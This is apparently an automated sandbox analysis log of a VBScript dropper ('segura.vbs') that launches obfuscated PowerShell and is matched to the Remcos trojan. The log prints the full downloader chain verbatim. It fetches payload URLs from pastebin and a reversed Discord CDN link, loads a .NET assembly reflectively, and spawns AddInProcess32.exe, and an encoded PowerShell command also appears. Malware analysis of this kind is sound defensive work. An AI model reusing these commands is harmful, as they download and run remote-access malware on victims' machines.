Q?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD342D25EF 2_2_00007FFD342D25EF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342D40E0 4_2_00007FFD342D40E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C25FA 4_2_00007FFD342C25FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C465D 4_2_00007FFD342C465D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C32F3 4_2_00007FFD342C32F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD3439115D 4_2_00007FFD3439115D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD3439243D 4_2_00007FFD3439243D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD342D3A5D 7_2_00007FFD342D3A5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD342D25B2 7_2_00007FFD342D25B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD342D3C2D 7_2_00007FFD342D3C2D
Java / VBScript file with very long strings (likely obfuscated code)
Source: segura.vbs Initial sample: Strings found which are bigger than 50
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3033
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3033 Jump to behavior
Yara signature match
Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 4.2.powershell.exe.23069e50000.3.raw.unpack, h.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.23069e50000.3.raw.unpack, au.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, h.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, au.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.23069e90000.4.raw.unpack, h.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.23069e90000.4.raw.unpack, au.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.230519f7dc0.0.raw.unpack, h.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.230519f7dc0.0.raw.unpack, au.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, h.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, au.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@22/9@3/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcnnvqu5.vne.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
